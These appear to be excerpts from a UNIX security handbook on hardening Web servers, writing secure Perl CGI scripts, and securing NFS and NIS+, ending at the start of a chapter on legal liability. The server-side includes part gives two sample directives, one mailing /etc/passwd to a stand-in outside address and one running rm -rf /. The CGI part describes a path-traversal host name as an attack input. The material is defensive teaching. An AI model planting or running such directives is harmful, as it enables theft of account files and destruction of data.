srm.conf     Server Resource Map. This file contains more server configuration information. It determines the document root, whether or not users can have their own Web directories, the icon that is used for directory listings, the location of your CGI script directory, document redirections, and error messages.

Because the information in these files can be used to subvert your server or your entire system, you should protect these files so they can only be read and modified by the superuser:

-rw------- 1 root wheel 954 Aug 6 01:00 access.conf<br />

-rw------- 1 root wheel 2840 Aug 6 01:05 httpd.conf<br />

-rw------- 1 root wheel 3290 Aug 6 00:30 mime.types<br />

-rw------- 1 root wheel 4106 Nov 26 11:00 srm.conf<br />

18.2.2.2 Additional configuration issues<br />

Besides the setting of permissions, you may wish to enable or disable the following configuration options:<br />

Automatic directory listings<br />


Most Web servers will automatically list the contents of a directory if a file called index.html is not present in the directory. This feature can cause security problems, however, as it gives outsiders the ability to scan for files and vulnerabilities on your system.

Symbolic-link following<br />

Some servers allow you to follow symbolic links outside of the Web server's document tree. This allows<br />

somebody who has access to your Web server's tree to make other documents on your computer<br />

available for Web access. You may not want people to be able to do this, so don't enable the following<br />

of symbolic links. Alternatively, you may wish to set your Web server's symlinks "If Owner Match"<br />

option, so that links are followed only if the owner of the link matches the owner of the file that it points<br />

to.<br />

Server-side includes<br />

Server-side includes are directives that can be embedded in an HTML document. The includes are processed by the HTTP server before the document is sent to a requesting client. Server-side includes can be used to include other documents, or to execute commands and include their output.

Here are two sample server-side includes that demonstrate why their use is a bad idea:<br />
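(The directives below are illustrative examples in the NCSA include syntax; the command and the address are hypothetical.)

<!-- Mails the server's password file to an outsider whenever the page is viewed: -->
<!--#exec cmd="/bin/mail cracker@example.com < /etc/passwd"-->

<!-- Tries to delete every file that the server's UID can remove: -->
<!--#exec cmd="/bin/rm -rf /"-->

On NCSA-derived servers, automatic directory listings, server-side includes, and unrestricted symbolic-link following can all be turned off with the Options directive in access.conf. The directory path below is an assumption; use your own document root:

<Directory /usr/local/etc/httpd/htdocs>
Options SymLinksIfOwnerMatch
AllowOverride None
</Directory>

Because Indexes, Includes, and FollowSymLinks are omitted from the Options line, those features are disabled; SymLinksIfOwnerMatch permits only links whose owner matches the owner of the file they point to.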



18.2.3 Writing Secure CGI Scripts

Chapter 23, Writing Secure SUID and Network Programs, contains detailed information about writing secure programs, including CGI scripts.

In addition to the information that we describe in that chapter, there are further issues involved in writing programs for the World Wide Web.

Most security holes are not intentional. Nonetheless, the more people who have the ability to write scripts on<br />

your Web server, the greater the chance that one of those scripts will contain a significant flaw.<br />

● Do not allow users to place scripts on your server unless a qualified security professional has personally read through the scripts and assured you of their safety.

18.2.3.1 Do not trust the user's browser!<br />

HTML includes the ability to display selection lists, limit the length of fields to a certain number of characters,<br />

embed hidden data within forms, and specify variables that should be provided to CGI scripts. Nevertheless,<br />

you cannot make your CGI script depend on any of these restrictions. That is because any CGI script can be<br />

run by directly requesting the script's URL; attackers do not need to go through your form or use the interface<br />

that you provide.<br />

Be especially careful of the following:<br />

● If you create a selection list, the value that is returned for the input field will not necessarily match the allowable values that you have defined.

● If you specify a maximum length for a variable, the length of the variable that is provided to your script may be significantly longer. (What would your script do if provided with a username that is 4000 characters long?)

● Variables that are provided to your script may have names not defined in your script.

● The values for variables that are provided may contain special characters.

● The user may view data that is marked as "hidden."

● If you use cookies or special hidden tags to maintain state on your server, your script may receive cookies or tags that it never created.

Attackers are by definition malicious. They do not follow the rules. Never trust anything that is provided over<br />

the network.<br />

18.2.3.2 Testing is not enough!<br />

One of the reasons that it is surprisingly easy to create an unsecure CGI script is that it is very difficult to test<br />

your scripts against the wide variety of HTTP clients available. For example, most client programs will<br />

"escape," or specially encode, characters such as the backquote (`), which are specially interpreted by the<br />

<strong>UNIX</strong> shell. As a result, many CGI programmers do not expect the unencoded characters to be present in the<br />

input stream for their applications, and they do not protect their scripts against the possibility that the<br />

characters are present. Nevertheless, it is easy for the characters to be in the input stream, either as the result of<br />

a bug in a particular Web browser or, more likely, because a malicious attacker is attempting to subvert your<br />

CGI script and gain control of your server.<br />

● Check all values that are provided to your program for special characters and appropriate length.

By all values, we mean all values. This includes the contents of environment variables, host addresses, host names, URLs, user-supplied data, values chosen from selection lists, and even data that your script has inserted onto a WWW form through the use of the hidden data type.

Consider the case of a CGI script that creates a separate log file for each host that contacts your WWW server. The name of the log file might be the following: logfile/{hostname}. What will this program do if it is contacted by the "host" ../../../../etc/passwd? Such a script, if improperly constructed, could end up appending a line to the system's /etc/passwd file. This could then be used as a way of creating unauthorized accounts on the system.
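A minimal sketch of this kind of check in Perl (not code from a real server; the environment variable, length limit, and log directory are assumptions for illustration):

#!/usr/local/bin/perl -T
use strict;

# Accept the client's host name only if it looks like a host name and is of
# reasonable length; refuse the request otherwise.
my $host = $ENV{'REMOTE_HOST'} || $ENV{'REMOTE_ADDR'} || '';

unless (length($host) <= 64 && $host =~ m/^([A-Za-z0-9][A-Za-z0-9.-]*)$/) {
    print "Content-type: text/plain\r\n\r\n";
    print "Sorry, your request could not be processed.\n";
    exit 0;
}
my $safe_host = $1;    # untainted copy of the matched value

# Only now is the value used to build a file name.
open(LOG, ">>/usr/local/etc/httpd/logs/logfile/$safe_host")
    or die "cannot append to log file: $!";
print LOG scalar(localtime), " request from $safe_host\n";
close(LOG);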

● Beware of system( ), popen( ), pipes, backquotes (`), and Perl's eval( ) function.

Many programming languages, including C, ksh, sh, csh, and Perl, provide the means to spawn subprocesses. You should try to avoid using these features when writing CGI scripts. If you must spawn a subprocess, avoid passing through any strings that are provided by the user. If you must pass user-supplied strings to the subprocess, be sure that they do not contain shell metacharacters, including the `$|;>* characters.

It is generally better to specify a list of allowable characters than to specify a list of dangerous characters. If<br />

you forget to specify an allowable character, there is no real harm done. But if you forget to specify a<br />

dangerous character, such as a backquote, you can compromise the security of your entire system.<br />

18.2.3.3 Sending mail<br />

If you are writing a CGI script that allows a user to send mail, use the /usr/lib/sendmail program to send the<br />

mail, rather than /bin/mailx or /usr/ucb/mail. The reason is that /usr/lib/sendmail does not have shell escapes,<br />

whereas the other mailers do.<br />

Here is a bit of Perl that you can use to send mail securely. It bypasses the shell by using exec( ) with a fixed argument list to run /usr/lib/sendmail directly:

open (WRITE, "|-")
    || exec ("/usr/lib/sendmail", "-oi", "-t")
    || die "Can't fork: $!\n";

print WRITE "To: $address\n";<br />

print WRITE "Subject: $subject\n";<br />

print WRITE "From: $sender\n";<br />

print WRITE "\n$message\n.\n";<br />

close(WRITE);<br />

There are many commands in Perl that will run the shell, possibly without your knowledge. These include<br />

system ( ), eval ( ), pipes, backquotes, and, occasionally, exec ( ) (if shell meta characters are present on the<br />

command line).<br />

18.2.3.4 Tainting with Perl<br />

If you are using the Perl programming language, you can use Perl's "tainting" facility to track information that<br />

has been provided by the user. Perl marks such information as "tainted." The only way to untaint information<br />

is to match it using a Perl regular expression, and then to copy out the matched values using Perl's string match<br />

variables.<br />

For example, if you have a name that has been provided by the user, you can untaint the value to be sure that it<br />


only contains letters, numbers, commas, spaces, and periods by using the following Perl statements:<br />

$tainted_username =~ m/([a-zA-Z0-9,. ]*)/;
$untainted_username = $1;

You can use the following to extract an email address:

$tainted_email =~ /([\w.%-]+\@[\w.-]+)/;
$untainted_email = $1;

There are two ways to enable tainting. If you are using Perl 4, you should invoke the taintperl command<br />

instead of the Perl command, by placing the following statement (or something similar) at the beginning of<br />

your file:<br />

#!/usr/local/bin/taintperl<br />

If you are using Perl version 5, you accomplish the same result by using the -T flag:<br />

#!/usr/local/bin/perl -T<br />

18.2.3.5 Beware stray CGI scripts<br />

Most Web servers can be configured so that all CGI scripts must be confined to a single directory. We<br />

recommend this configuration, because it makes it easier for you to find and examine all of the CGI scripts on<br />

your system. We do not recommend the practice of allowing any file on the Web server with the extension<br />

".cgi" to be run as a CGI script.<br />

Instead, we recommend that you:<br />

● Configure your Web server so that all CGI scripts must be placed in a single directory (typically, the directory is called cgi-bin).

● Use a program such as Tripwire (see Chapter 9, Integrity Management) to monitor for unauthorized changes to these scripts.

● Allow limited access to this directory and its contents. Local users should not be allowed to install or remove scripts, or to edit existing scripts without administrative review. You also may want to prevent these scripts from being read, to prevent someone from snooping.

● Remove the backup files that are automatically generated by your editor. Many system administrators use text editors such as Emacs to edit scripts that are in place on the running server. Frequently, this leaves behind backup files, with names such as start~ or create-account~. These backup files can be executed by an attacker, usually with unwanted results. One way to sweep for such leftovers is shown below.
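The following commands are one way to perform that sweep; the server root shown, and whether your version of find supports -path, are assumptions to adapt to your system:

# find /usr/local/etc/httpd \( -name '*~' -o -name '*.bak' -o -name '#*#' \) -print
# find /usr/local/etc/httpd -name '*.cgi' ! -path '*/cgi-bin/*' -print

The first command lists leftover editor backup files; the second lists any script named *.cgi that has strayed outside the cgi-bin directory.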

18.2.4 Keep Your Scripts <strong>Sec</strong>ret!<br />

Throughout this book, we have railed against the practice of security through obscurity - the practice of basing<br />

some of the security of your system upon undocumented aspects. Nevertheless, the fact remains that the ready<br />

availability of <strong>UNIX</strong> source code, as opposed to the relative "obscurity" of the source code for other operating<br />

systems such as VMS or Windows/NT, means that potential attackers can search through the operating system<br />

looking for avenues of attack, and then craft their attacks in such a way as to guarantee the maximum possible<br />

access. One good way to prevent these sorts of attacks is to limit the access to source code.<br />

Because it is so easy to make a mistake when writing a CGI program, it behooves you to keep your CGI scripts and programs confidential. This does not guarantee security for buggy scripts: a determined attacker

can still probe and, frequently, find flaws with your system. However, it does significantly increase the work<br />

that is involved. Determined attackers will still get through, but casual attackers may move on to other, more<br />

inviting systems.<br />

● Prevent network users from reading the contents of your CGI scripts. This will help keep an attacker from analyzing the scripts to discover security flaws. This is especially important for scripts that are written inside your organization, and thus might not be subject to the same degree of certification and checking as scripts that are written for publication or redistribution.

18.2.4.1 Beware mixing HTTP with anonymous FTP<br />

Many sites use the same directory for storing documents that are accessed through anonymous FTP and the<br />

World Wide Web. For example, you may have a directory called /NetDocs on your server that is both the<br />

home directory of the FTP user and the root directory of your Web server. This would allow files to be referred to by two URLs, such as http://server.com/nosmis/myfile.html or ftp://server.com/nosmis/myfile.html.

The primary advantage of HTTP over FTP is speed and efficiency. HTTP is optimized for anonymous access<br />

from a stateless server. FTP, on the other hand, had anonymous access added as an afterthought, and requires<br />

that the server maintain a significant amount of state for the client.

Mixing HTTP and FTP directories poses a variety of security issues, including:<br />

● Allowing anonymous FTP access to the HTTP directories gives users a means of bypassing any restrictions on document access that the Web server may be providing. Thus, if you have confidential documents stored on your Web server, they may not remain confidential for long with this arrangement.

● If an attacker can download your CGI scripts with FTP, he can search them for avenues for attack.

● You must be very sure that there is no way for an FTP user to upload a script that will be run on your server.

● The /etc/passwd file present for your FTP service might be visible to someone using the WWW service, thus leading to a compromise of its contents. If you have included any real passwords in that file, they will be available to the client for remote password cracking.

18.2.5 Other Issues<br />

There are many other measures that you can take to make your server more secure. For example, you can limit<br />

the use of the computer so that it is solely a Web server. This will make it harder for an attacker to break in to<br />

your server and, if an attacker does, it will limit the amount of damage that he can do to the rest of your<br />

network.<br />

If you do choose to make your server a stand-alone computer, read over Chapter 21, Firewalls, for a list of techniques that you can use to isolate your computer from your network and make the computer difficult for an attacker to use. In particular, you may wish to consider the following options:

● Delete all unnecessary accounts.

● Do not NFS mount or export any directories.

● Delete all compilers.

● Delete all utility programs that are not used during boot or by the Web server.

● Provide as few network services as possible.

● Do not run a mail server.

Another option, but one that may require a non-trivial amount of work, is to place your WWW server and all<br />

files in a separate directory structure. The WWW server is then wrapped with a small program that does a<br />

chroot ( ) to the directory (see Chapter 22, Wrappers and Proxies). Thus, if some way is found to break out of<br />

the controls you have placed on the server, the regular filesystem is hidden and protected from attack. Some<br />

WWW servers may have this approach included as an install-time option, so check the documentation.<br />
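Such a wrapper can be very small. The sketch below shows the idea in Perl; it is not a drop-in tool, and the paths are assumptions that must match your own chroot tree (which also needs any shared libraries, devices, and configuration files the server expects):

#!/usr/local/bin/perl
# Hypothetical wrapper: confine the Web server to its own directory tree,
# then start it.  Must be run as root, before the server drops privileges.
use strict;

my $jail   = '/usr/local/etc/httpd';   # top of the server's private tree
my $server = '/httpd';                 # path to the binary *inside* the jail

chroot($jail) or die "chroot $jail: $!";
chdir('/')    or die "chdir: $!";
exec($server) or die "exec $server: $!";   # server now sees $jail as "/"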


Chapter 20<br />

NFS<br />

20.2 Server-Side NFS <strong>Sec</strong>urity<br />

Because NFS allows users on a network to access files stored on the server, NFS has significant security implications<br />

for the server. These implications fall into three broad categories:<br />

Client access<br />

NFS can (and should) be configured so that only certain clients on the network can mount filesystems stored<br />

on the server.<br />

User authentication<br />

NFS can (and should) be configured so that users can only access and alter files to which they have been<br />

granted access.<br />

Eavesdropping and data spoofing<br />

NFS should (but does not) protect information on the network from eavesdropping and surreptitious<br />

modification.<br />

20.2.1 Limiting Client Access: /etc/exports and /etc/dfs/dfstab<br />

The NFS server can be configured so that only certain hosts are allowed to mount filesystems on the server. This is a<br />

very important step in maintaining server security: if an unauthorized host is denied the ability to mount a filesystem,<br />

then the unauthorized users on that host will not be able to access the server's files.<br />

20.2.1.1 /etc/exports<br />

Many versions of UNIX, including Sun's SunOS, HP's HP-UX, and SGI's IRIX operating systems, use the /etc/exports file to designate which clients can mount the server's filesystem and what access those clients are to be given. Each line in the /etc/exports file generally has the form:

directory -options [,more options]<br />

For example, a sample /etc/exports file might look like this:<br />

/ -access=math,root=prose.domain.edu<br />

/usr -ro<br />

/usr/spool/mail -access=math<br />

The directory may be any directory or filesystem on your server. In the example, exported directories are /, /usr, and<br />

/usr/spool/mail.<br />

The options allow you to specify a variety of security-related options for each directory. These include:<br />

access=machinelist<br />

Grants access to this filesystem only to the hosts or netgroups[8] specified in machinelist. The names of hosts<br />


and netgroups are listed and separated by colons (e.g., host1:host2:group3). A maximum of ten hosts or group<br />

names can be listed in some older systems (check your documentation).[9]<br />

[8] See the discussion of RPC and netgroups in Chapter 19.<br />

[9] There was an old bug in NFS that caused a filesystem to be exported to the world if an exports<br />

line exceeded 256 characters after name alias expansion. Use showmount -e to verify when<br />

finished.<br />

ro

Exports the directory and its contents as read-only to all clients. This option overrides whatever the file permission bits are actually set to.

rw=machinelist<br />

Exports the filesystem read-only to all hosts except those listed, which are allowed read/write access to the<br />

filesystem.<br />

root=machinelist<br />

Normally, NFS changes the user ID for requests issued by the superuser on remote machines from 0 (root) to -2 (nobody). Specifying a list of hosts gives the superuser on these remote machines superuser access on the server.

anon=uid<br />

Specifies what user ID to use on NFS requests that are not accompanied by a user ID, such as might happen<br />

from a DOS client. The number specified is used for both the UID and the GID of anonymous requests. A<br />

value of -2 is the nobody user. A value of -1 usually disallows access.<br />

secure<br />

Specifies that NFS should use Sun's Secure RPC (AUTH_DES) authentication system, instead of AUTH_UNIX. (See Chapter 19, RPC, NIS, NIS+, and Kerberos, for more information.)

You should understand that NFS maintains options on a per-filesystem basis, not on a per-directory basis. If you put two directories in the /etc/exports file that actually reside on the same filesystem, they will use the same options (usually the options used in the last export listed).

Sun's documentation of anon states that, "If a request comes from an unknown user, use the given UID as the<br />

effective user ID." This statement is very misleading; in fact, NFS by default honors "unknown" user IDs - that is, UIDs that are not in the server's /etc/passwd file - in the same way that it honors "known" UIDs, because the NFS server does not ever read the contents of the /etc/passwd file. The anon option actually specifies which UID to use

for NFS requests that are not accompanied by authentication credentials.<br />

Let's look at the example /etc/exports file again:<br />

/ -access=math,root=prose.domain.edu<br />

/usr -ro<br />

/usr/spool/mail -access=math<br />

This example allows anybody in the group math or on the machine math to mount the root directory of the server,<br />

but only the root user on machine prose.domain.edu has superuser access to these files. The /usr filesystem is<br />

exported read-only to every machine that can get RPC packets to and from this server (usually a bad idea - this may<br />

be a wider audience than the local network). And the /usr/spool/mail directory is exported to any host in the math<br />

netgroup.<br />

20.2.1.2 /usr/etc/exportfs<br />


The /usr/etc/exportfs program reads the /etc/exports file and configures the NFS server, which runs inside the<br />

kernel's address space. After you make a change to /etc/exports, be sure to type this on the server:<br />

# exportfs -a<br />

You can also use the exportfs command to temporarily change the options on a filesystem. Because different<br />

versions of the command have slightly different syntax, you should consult your documentation.<br />

20.2.1.3 Exporting NFS directories under System V: share and dfstab<br />

Versions of NFS that are present on System V systems (including Solaris 2.x) have dispensed with the /etc/exports<br />

file and have instead adopted a more general mechanism for dealing with many kinds of distributed filesystems in a<br />

uniform manner. These systems use a command called share to extend access for a filesystem to a remote machine,<br />

and the command unshare to revoke access.<br />

The share command has the syntax:<br />

share [ -F FSType ] [ -o specific_options ] [ -d description ] [ pathname]<br />

where FSType should be nfs for NFS filesystems, and specific_options are the same as those documented for the /etc/exports file earlier. The optional argument description is meant to be a human-readable description of the

filesystem that is being shared.<br />

When a system using this mechanism boots, its network initialization scripts execute the shell script /etc/dfs/dfstab.<br />

This file contains a list of share commands. For example:<br />

Example 20.1: An /etc/dfs/dfstab file With Some Problems<br />

# place share(1M) commands here for automatic execution<br />

# on entering init state 3.<br />

#<br />

# This configuration is not secure.<br />

#<br />

share -F nfs -o rw=red:blue:green /cpg<br />

share -F nfs -o rw=clients -d "spool" /var/spool<br />

share -F nfs /tftpboot<br />

share -F nfs -o ro /usr/lib/X11/ncd<br />

share -F nfs -o ro /usr/openwin<br />

This file gives the computers red, blue, and green access to the /cpg filesystem; it also gives all of the computers in<br />

the clients netgroup access to /var/spool. All computers on the network are given read-write access to the /tftpboot<br />

directory; and all computers on the network are given read-only access to the directories /usr/lib/X11/ncd and<br />

/usr/openwin.<br />

Do you see the security hole in the above configuration? It's explained in detail in <strong>Sec</strong>tion 20.4, "Improving NFS<br />

<strong>Sec</strong>urity" later in this chapter.<br />

NOTE: Do not export your filesystems back to your own machine if your RPC portmapper has proxy<br />

forwarding enabled (the default in many vendor versions). You should not export your partitions to the<br />

local host, either by name or to the alias localhost, and you should not export to any netgroups of which<br />

your host is a member. If proxy forwarding is enabled, an attacker can carefully craft NFS packets and<br />

send them to the portmapper, which in turn forwards them to the NFS server. As the packets come from<br />

the portmapper process (which is running as root), they appear to be coming from a trusted system. This<br />

configuration can allow anyone to alter and delete files at will.<br />



20.2.2 The showmount Command<br />

You can use the <strong>UNIX</strong> command /usr/etc/showmount to list all of the clients that have probably mounted directories<br />

from your server. This command has the form:<br />

/usr/etc/showmount [options] [host]<br />

The options are:<br />

-a

Lists all of the hosts and which directories they have mounted.

-d

Lists only the directories that have been remotely mounted.

-e

Lists all of the filesystems that are exported; this option is described in more detail later in this chapter.

NOTE: The showmount command does not tell you which hosts are actually using your exported<br />

filesystems; it shows you only the names of the hosts that have mounted your filesystems since the last<br />

reset of the local log file. Because of the design of NFS, you can use a filesystem without first mounting<br />

it.<br />

NFS Exports Under Linux<br />

The Linux NFS server offers a sophisticated set of options that can be placed in the /etc/exports file. While these<br />

options seem to increase security, they actually don't.<br />

The options are:<br />

secure<br />

This option requires that incoming NFS requests come from an IP port less than 1024, one of the "secure"<br />

ports. This requirement prevents an attacker from sending requests directly to your NFS server unless the<br />

attacker has obtained superuser access. (Of course, if the attacker has obtained root access, this option does<br />

not help.) This option is equivalent to NFS port monitoring under other versions of <strong>UNIX</strong> (e.g., nfs_portmon<br />

under SunOS).<br />

root_squash<br />

Forces requests from UID 0 to be mapped to the anonymous UID. Unfortunately, this option does not protect other UIDs.

no_root_squash<br />

Turns off root squashing. Even less secure.<br />

squash_uids=0-10,20,25-30<br />

Allows you to specify other UIDS that are mapped to the anonymous UID. Of course, an attacker can still gain<br />

access to your system by using non-squashed UIDs.<br />

all_squash<br />

Specifies that all UIDS should be mapped to the anonymous UID. This option does genuinely increase your<br />

system's security, but why not simply export your filesystem read-only?<br />
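In the Linux /etc/exports format, these options are attached to each client entry. The following is only an illustrative entry, with made-up host names:

# /etc/exports on a Linux NFS server (example only)
/home    red(rw,secure,root_squash)    blue(ro,all_squash)

Here the host red gets read-write access with root mapped to the anonymous UID, while blue gets read-only access with every UID mapped to the anonymous UID.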


Chapter 19

RPC, NIS, NIS+, and Kerberos

19.5 Sun's NIS+

NIS was designed for a small, friendly computing environment. As Sun Microsystems' customers began

to build networks with thousands or tens of thousands of workstations, NIS started to show its<br />

weaknesses:<br />

● NIS maps could only be updated by logging onto the server and editing files.

● NIS servers could only be updated in a single batch operation. Updates could take many minutes, or even hours, to complete.

● All information transmitted by NIS was transmitted without encryption, making it subject to eavesdropping.

● NIS updates themselves were authenticated with AUTH_UNIX RPC authentication, making them subject to spoofing.

To respond to these complaints, Sun Microsystems started working on an NIS replacement in 1990. That<br />

system was eventually released a few years later as NIS+.<br />

NIS+ quickly earned a bad reputation. By all accounts, the early releases were virtually untested and<br />

rarely operated as promised. Sun Microsystems sent engineers into the field to debug their software at<br />

customer sites. Eventually, Sun worked the bugs out of NIS+ and today it is a more reliable system for<br />

secure network management and control.<br />

An excellent reference for people using NIS+ is Rick Ramsey's book, All About Administering NIS+ (SunSoft Press, Prentice Hall, 1994).

19.5.1 What NIS+ Does<br />

NIS+ creates network databases that are used to store information about computers and users within an<br />

organization. NIS+ calls these databases tables; they are functionally similar to NIS maps. Unlike NIS,<br />

NIS+ allows for incremental updates of the information stored on replicated database servers throughout<br />

the network.<br />

Each NIS+ domain has one and only one NIS+ root domain server. This is a computer that contains the<br />

master copy of the information stored in the NIS+ root domain. The information stored on this server can

be replicated, allowing the network to remain usable even when the root server is down or unavailable.<br />

There may also be NIS+ servers for subdomains.<br />


Entities that communicate using NIS+ are called NIS+ principals. An NIS+ principal may be a host or an

authenticated user. Each NIS+ principal has a public key and a secret key, which are stored on an NIS+<br />

server in the domain. (As this is <strong>Sec</strong>ure RPC, the secret key is stored encrypted.)<br />

All communication between NIS+ servers and NIS+ principals takes place through Secure RPC. This

makes the communication resistant to both eavesdropping and spoofing attacks. NIS+ also oversees the<br />

creation and management of <strong>Sec</strong>ure RPC keys; by virtue of using NIS+, every member of the<br />

organization is enabled to use <strong>Sec</strong>ure RPC.<br />

19.5.2 NIS+ Objects<br />

All information stored on an NIS+ server is stored in the form of objects. NIS+ supports three<br />

fundamental kinds of objects:<br />

Table objects<br />

Store configuration information.<br />

Group objects<br />

Used for NIS+ authorization, NIS+ groups give you a way to collectively refer to a set of NIS+<br />

principals (users or machines) at a single time.<br />

Directories<br />

Provide structure to an NIS+ server. Directories can store tables, groups, or other directories,<br />

creating a tree structure on the NIS+ server similar to the <strong>UNIX</strong> filesystem.<br />

19.5.3 NIS+ Tables<br />

Information stored in NIS+ tables can be retrieved using any table column as a key; NIS+ thus eliminates<br />

the need under NIS to have multiple NIS maps (such as group.bygid and group.byname). NIS+<br />

predefines 16 tables (see Table 19.2); users are free to create additional tables of their own.<br />

Table 19.2: NIS+ Predefined Tables

Table         Equivalent UNIX File                               Stores

Hosts         /etc/hosts                                         IP address and hostname of every workstation in the NIS+ domain.
Bootparams    /etc/bootparams                                    Configuration information for diskless clients, including location of root, swap and dump partitions.
Passwd        /etc/passwd                                        User account information (password, full name, home directory, etc.)
Cred                                                             Secure RPC credentials for users in the domain.
Group         /etc/group                                         Groupnames, passwords, and members of every UNIX group.
Netgroup      /etc/netgroup                                      Netgroups to which workstations and users belong.
Mail_Aliases  /usr/lib/aliases, /etc/aliases, /etc/mail/aliases  Electronic mail aliases.
Timezone      /etc/timezone                                      The time zone of each workstation in the domain.
Networks      /etc/networks                                      The networks in the domain and their canonical names.
Netmasks      /etc/inet/netmasks, /etc/netmasks                  The name of each network in the domain and its associated netmask.
Ethers        /etc/ethers                                        The Ethernet address of every workstation in the domain.
Services      /etc/services                                      The port number for every Internet service used in the domain.
Protocols     /etc/protocols                                     The IP protocols used in the domain.
RPC                                                              The RPC program numbers for RPC servers in the domain.
Auto_Home     None                                               The location of home directories for users in the domain.
Auto_Mounter  None                                               Information for Sun's Automounter.

19.5.4 Using NIS+<br />

For users, using an NIS+ domain can be remarkably pleasant. When a user logs in to a workstation, the<br />

/bin/login command automatically acquires the user's NIS+ security credentials and attempts to decrypt<br />

them with the user's login password.<br />

If the account password and the NIS+ credentials password are the same (and they usually are), the NIS+<br />

keyserv process will cache the user's secret key and the user will have transparent access to all <strong>Sec</strong>ure<br />

RPC services. If the account password and the NIS+ credentials password are not the same, then the user<br />

will need to manually log in to the NIS+ domain by using the keylogin command.<br />

NIS+ users should change their passwords with the NIS+ nispasswd command, which works in much the<br />

same way as the standard <strong>UNIX</strong> passwd command.<br />

NIS+ security is implemented by providing a means for authenticating users, and by establishing access<br />

control lists that control the ways that those authenticated users can interact with the information stored<br />

in NIS+ tables. NIS+ provides for two authentication types:<br />

LOCAL

Authentication based on the UID of the UNIX process executing the NIS+ command. LOCAL authentication is used largely for administering the root NIS+ server.

DES

Authentication based on Secure RPC. Users must have their public key and encrypted secret key stored in the NIS+ Cred table to use DES authentication.


Like <strong>UNIX</strong> files, each NIS+ object has an owner, which is usually the object's creator. (An object's<br />

owner can be changed with the nischown command.) NIS+ objects also have access control lists, which<br />

are used to control which principals have what kind of access to the object.<br />

NIS+ allows four kinds of access to objects:<br />

Read Ability to read the contents of the object.<br />

Modify Ability to modify the contents of the object.<br />

Create Ability to create new objects within the table.<br />

Destroy Ability to destroy objects contained within the table.<br />

NIS+ maintains a list of these access rights for four different kinds of principals:<br />

Nobody Unauthenticated requests, such as requests from individuals who do not have NIS+ credentials<br />

within this NIS+ domain.<br />

Owner The principal that created the object (or that was assigned ownership via the nischown<br />

command).<br />

Group Other principals in the object's group.<br />

World Other principals within the object's NIS+ domain.<br />

The way that NIS+ commands display access rights is similar to the way that the UNIX ls command displays file permissions. The key difference is that NIS+ access rights are displayed as a list of 16

characters, and the first four characters represent the rights for "nobody," rather than "owner," as shown<br />

in Figure 19.2.<br />

Figure 19.2: NIS+ access rights are displayed as a list of 16 characters<br />

NIS+ tables may provide additional access privileges for individual rows, columns or entries that they<br />

contain. Thus, all authenticated users may have read access to an entire table, but each user may further<br />

have the ability to modify the row of the table associated with the user's own account. Note that while<br />

individual rows, columns or entries can broaden the access control list, they cannot impose more<br />

restrictive rules.<br />
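As a hedged illustration (table and domain names will differ on your system), the standard NIS+ administrative commands can be used to display and adjust these rights:

% nisls -l org_dir
% niscat -o passwd.org_dir
% nischmod g+m passwd.org_dir

The first two commands show the owner, group, and 16-character access rights of the directory's objects and of the passwd table; the third grants modify access to the table's group.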

19.5.4.1 Changing your password<br />


Once a user has her NIS+ account set up, she should use the nispasswd command to change the<br />

password:<br />

% nispasswd<br />

Changing password for simsong on NIS+ server.<br />

Old login password: fj39=3-f<br />

New login password: fj43fadf<br />

Re-enter new password:<br />

NIS+ password information changed for simsong<br />

NIS+ credential information changed for simsong<br />

%<br />

19.5.4.2 When a user's passwords don't match<br />

If a user has a different password stored on their workstation and on the <strong>Sec</strong>ure RPC server, he will see<br />

the following message when he logs in:<br />

login: simsong<br />

Password: fj39=3-f<br />

Password does not decrypt secret key for unix.237@cpg.com.<br />

Last login: Sun Nov 19 18:03:42 from sun.vineyard.net<br />

Sun Microsystems Inc. SunOS 5.4 Generic July 1994<br />

%<br />

In this case, the user has a problem because the password that the user knows and uses to log in, for some reason, does not match the password that was used to encrypt the user's secret key on the Secure RPC server. The user can't change his password with the nispasswd program, because he doesn't know his NIS+ password:

% nispasswd<br />

Changing password for simsong on NIS+ server.<br />

Old login password:<br />

Sorry.<br />

%<br />

Likewise, the superuser can't run the nispasswd program for the user. The only solution is for the system<br />

administrator to become superuser and give the user a new key:<br />

# newkey -u simsong<br />

Updating nisplus publickey database.<br />

Adding new key for unix.237@cpg.com.<br />

Enter simsong's login password: fj39=3-f<br />

#<br />

This procedure sets the user's <strong>Sec</strong>ure RPC password to be the same as their login password. Note that<br />

you must know the user's login password. If you don't, you'll get this error:<br />

# newkey -u simsong<br />

Updating nisplus publickey database.<br />

Adding new key for unix.237@cpg.com.<br />


Enter simsong's login password: nosmis<br />

newkey: ERROR, password differs from login password.<br />

#<br />

After the user has a new key, he can then use the nispasswd command to change his password, as shown<br />

above.<br />

19.5.5 NIS+ Limitations<br />

If properly configured, NIS+ can be a very secure system for network management and authentication.<br />

However, like all security systems, it is possible to make a mistake in the configuration or management<br />

of NIS+ that would render a network that it protects somewhat less than absolutely secure.<br />

Here are some things to be aware of:<br />

● Do not run NIS+ in NIS compatibility mode. NIS+ has an NIS compatibility mode that allows the NIS+ server to interoperate with NIS clients. If you run NIS+ in this mode, then any NIS server on your network (and possibly other networks as well) will have the ability to access any piece of information stored within your NIS+ server. Typically, NIS access is used by attackers to obtain a copy of your domain's encrypted password file, which is then used to probe for weaknesses.

● Manually inspect the permissions of your NIS+ objects on a regular basis. System integrity checking software such as COPS and Tripwire does not exist (yet) for NIS+. In its absence, you must manually inspect the NIS+ tables, directories and groups on a regular basis. Be on the lookout for objects that can be modified by Nobody or by World; also be on the lookout for tables in which new objects can be created by these principal classes.

● Secure the computers on which your NIS+ servers are running. Your NIS+ server is only as secure as the computer on which it is running. If attackers can obtain root access on your NIS+ server, they can make any change that they wish to your NIS+ domain, including creating new users, changing user passwords, and even changing your NIS+ server's master password.

● NIS+ servers operate at one of three security levels, described in Table 19.3. Make sure that your server is operating at level 2, which is the default level.

Table 19.3: NIS+ Server Security Levels

Security Level  Description

0   NIS+ server runs with all security options turned off. Any NIS+ principal may make any change to any NIS+ object. This level is designed for testing and initially setting up the NIS+ namespace. Security level 0 should not be present in a shipping product (but for some reason it is). Do not use security level 0.

1   NIS+ server runs with security turned on, but with DES authentication turned off. That is, the server will respond to any request in which LOCAL or DES authentication is specified, opening it up to a wide variety of attacks. Security level 1 is designed for testing and debugging; like security level 0, it should not be present in a shipping "security" product. Do not use it.

2   NIS+ server runs with full security authentication and access checking enabled. Only run NIS+ servers at security level 2.


Chapter 26

Computer Security and U.S. Law

26.4 Other Liability

When you operate a computer, you have more to fear than break-ins and physical disasters. You also<br />

need to worry that the actions of some of your own users (or yourself) may result in violation of the law,<br />

or civil action. Here, we present a few notable concerns in this area.<br />

